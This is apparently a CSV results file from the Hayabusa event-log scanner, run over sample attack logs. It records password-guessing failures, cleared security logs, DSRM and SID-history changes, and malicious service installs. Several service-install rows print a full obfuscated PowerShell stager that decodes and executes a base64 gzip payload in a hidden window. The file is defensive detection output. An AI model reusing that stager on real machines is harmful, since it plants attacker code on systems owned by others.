NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6G
WDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-13 08:39:43.512 
+09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
